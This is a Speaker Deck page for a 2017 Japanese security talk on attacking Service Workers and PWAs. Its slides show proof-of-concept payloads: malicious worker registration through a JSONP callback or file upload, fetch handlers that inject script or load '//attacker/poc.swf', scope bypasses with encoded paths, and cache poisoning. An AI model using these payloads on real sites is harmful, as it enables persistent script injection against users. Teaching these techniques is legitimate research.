Upgrade to Pro — share decks privately, control downloads, hide ads and more …

攻撃者視点で見る Service Worker / PWA Study SW

Sponsored · Your Podcast. Everywhere. Effortlessly. Share. Educate. Inspire. Entertain. You do you. We'll handle the rest.
Avatar for Masato Kinugawa Masato Kinugawa
September 14, 2017
Technology
20
27k

攻撃者視点で見る Service Worker / PWA Study SW

PWA Study( https://web-study.connpass.com/event/65267/ ) で発表した資料です。

Avatar for Masato Kinugawa

Masato Kinugawa

September 14, 2017
Tweet

More Decks by Masato Kinugawa

See All by Masato Kinugawa
Shadow DOMとセキュリティ - 光と影の境界を探る / Shibuya.XSS techtalk #13
Avatar for Masato Kinugawa masatokinugawa
0
740
Shadow DOM & Security - Exploring the boundary between light and shadow
Avatar for Masato Kinugawa masatokinugawa
1
2k
ブラウザのレガシー・独自機能を愛でる-Firefoxの脆弱性4選- / Browser Crash Club #1
Avatar for Masato Kinugawa masatokinugawa
1
1.1k
注目したいクライアントサイドの脆弱性2選/ Security.Tokyo #3
Avatar for Masato Kinugawa masatokinugawa
8
4.2k
バグハンティングのすゝめ / P3NFEST
Avatar for Masato Kinugawa masatokinugawa
5
2.6k
Pwn2OwnでMicrosoft Teamsをハッキングして2000万円を獲得した方法/ Shibuya.XSS techtalk #12
Avatar for Masato Kinugawa masatokinugawa
13
21k
How I Hacked Microsoft Teams and got $150,000 in Pwn2Own
Avatar for Masato Kinugawa masatokinugawa
1
23k
JSでDoSる/ Shibuya.XSS techtalk #11
Avatar for Masato Kinugawa masatokinugawa
20
7.1k
Electron: Abusing the lack of context isolation - CureCon(en)
Avatar for Masato Kinugawa masatokinugawa
5
110k

Other Decks in Technology

See All in Technology
Kiro Meetup #7 Kiro アップデート (2025/12/15〜2026/3/20)
Avatar for Katz Ueno katzueno
2
250
DDD×仕様駆動で回す高品質開発のプロセス設計
Avatar for Koichiro Matsuoka littlehands
6
2.4k
Navigation APIと見るSvelteKitのWeb標準志向
Avatar for Okuto Oyama yamanoku
2
110
君はジョシュアツリーを知っているか?名前をつけて事象を正しく認識しよう / Do you know Joshua Tree?
Avatar for Y-KANOH ykanoh
4
120
スピンアウト講座06_認証系(API-OAuth-MCP)入門
Avatar for overflow ,Inc overflowinc
0
1.1k
BFCacheを活用して無限スクロールのUX を改善した話
Avatar for Ryuya Yanagi apple_yagi
0
120
「捨てる」を設計する
Avatar for kubell kubell_hr
0
240
形式手法特論:SMT ソルバで解く認可ポリシの静的解析 #kernelvm / Kernel VM Study Tsukuba No3
Avatar for y_taka_23 ytaka23
1
790
データマネジメント戦略Night - 4社のリアルを語る会
Avatar for Tatsuya Koreeda ktatsuya
1
230
Phase11_戦略的AI経営
Avatar for overflow ,Inc overflowinc
0
1.5k
Phase04_ターミナル基礎
Avatar for overflow ,Inc overflowinc
0
2.3k
AIエージェント×GitHubで実現するQAナレッジの資産化と業務活用 / QA Knowledge as Assets with AI Agents & GitHub
Avatar for Hitsuji tknw_hitsuji
0
230

Featured

See All Featured
How to Ace a Technical Interview
Avatar for Jacob Kaplan-Moss jacobian
281
24k
Navigating Algorithm Shifts & AI Overviews - #SMXNext
Avatar for Aleyda Solis aleyda
1
1.2k
Speed Design
Avatar for Sergey Chernyshev sergeychernyshev
33
1.6k
The Director’s Chair: Orchestrating AI for Truly Effective Learning
Avatar for Mike Taylor tmiket
1
140
Utilizing Notion as your number one productivity tool
Avatar for Mfonobong Umondia mfonobong
4
270
A brief & incomplete history of 
UX Design for the World Wide Web: 1989–2019
Avatar for Jason CranfordTeague jct
1
330
The Power of CSS Pseudo Elements
Avatar for Geoffrey Crofte geoffreycrofte
82
6.2k
Agile Leadership in an Agile Organization
Avatar for Dr. Kim W Petersen kimpetersen
PRO
0
120
Paper Plane
Avatar for Katie Cordina Lindsey katiecoart
PRO
0
48k
The Hidden Cost of Media on the Web [PixelPalooza 2025]
Avatar for Tammy Everts tammyeverts
2
250
Unsuck your backbone
Avatar for Amy Palamountain ammeep
672
58k
Redefining SEO in the New Era of Traffic Generation
Avatar for Szymon Słowik szymonslowik
1
250

Transcript

  1. None
  2. None

  3. • •

  4. • • • <script> navigator.serviceWorker.register("/sw.js") </script>

  5. • • •

  6. • • https://html5experts.jp/kyo_ago/5153/ https://speakerdeck.com/filedescriptor/exploiting-the-unexploitable-with-lesser-known-browser-tricks?slide=23

  7. None

  8. HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 [...] alert(1)//({});

  9. <script> navigator.serviceWorker.register("/jsonp?callback=[SW_HERE]//"); </script> HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 [...]

    onfetch=event=>console.log('fetch')//({});

  10. <script> var formData = new FormData(); formData.append("csrf_token", "secret"); var sw

    = "/* [SW_CODE] */"; var blob = new Blob([sw], { type: "text/javascript"}); formData.append("file", blob, "sw.js"); fetch("/upload", {method: "POST", body: formData}) .then(/* Register SW */); </script>

  11. • •

  12. • • onfetch=e=>{ body = '<script>alert(1)</script>'; init = {headers: {'content-type':

    'text/html'}}; e.respondWith(new Response(body,init)); }

  13. • • • <script> navigator.serviceWorker.register("/sw.js", {scope: "/"}) </script>

  14. • • "/assets/js/sw.js", {scope: "https://other.example.com/"} "/assets/js/sw.js", {scope: "/assets/"} "/assets/js/sw.js", {scope:

    "/assets/css/"} "/assets/js/sw.js", {scope: "/assets/js/"} "/assets/js/sw.js", {scope: "/assets/js/sub/"}

  15. HTTP/1.1 200 OK content-type: text/javascript service-worker-allowed: / [...]

  16. https://example.com/api/jsonp https://example.com/api%2Fjsonp

  17. ❝ ❞

  18. https://example.com/out-of-scope/ https://example.com/foo/..%2Fout-of-scope%2F

  19. None

  20. • • •

  21. onfetch=e=>{ e.respondWith(fetch("//attacker/poc.swf")) } •

  22. <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="example.jp" /> </cross-domain-policy> https://github.com/cure53/XSSChallengeWiki/wiki/XSSMas-Challenge-2016

  23. ❝ ❞

  24. <script src="//example.com/socialbutton.js"></script>

  25. self.addEventListener('install', e => { e.registerForeignFetch({ scopes: ['/'], origins: ['*']// });

    }); onforeignfetch = e => { e.respondWith(fetch(e.request).then(res => ({ response: new Response('alert(1)')// }))) }

  26. • •

  27. onfetch = event => { event.respondWith( caches.open("v1").then(function(cache) { return cache.match(event.request).then(function(response)

    { if (response) { return response;// } else { return fetch(event.request.clone()).then(function(response) { cache.put(event.request, response.clone());// return response; }); } }) }) ); };

  28. <script> caches.open("v1").then(function(cache){ content = "<script>alert(1)</script>"; init = {headers: {"content-type": "text/html"}};

    request = new Request("poison.html"); response = new Response(content, init); cache.put(request, response); }) </script>

  29. <script> document.write(localStorage.getItem('name')); </script>

  30. • • •

  31. • • HTTP/1.1 200 OK Content-Type:text/html Clear-Site-Data: "storage"

  32. GET https://example.com/sw.js HTTP/1.1 Host: example.com Connection: keep-alive Pragma: no-cache Cache-Control:

    no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: */* Service-Worker: script Referer: https://example.com/ Accept-Encoding: gzip, deflate, br Accept-Language: ja,en;q=0.8,en-US;q=0.6

  33. • •

  34. None
  35. None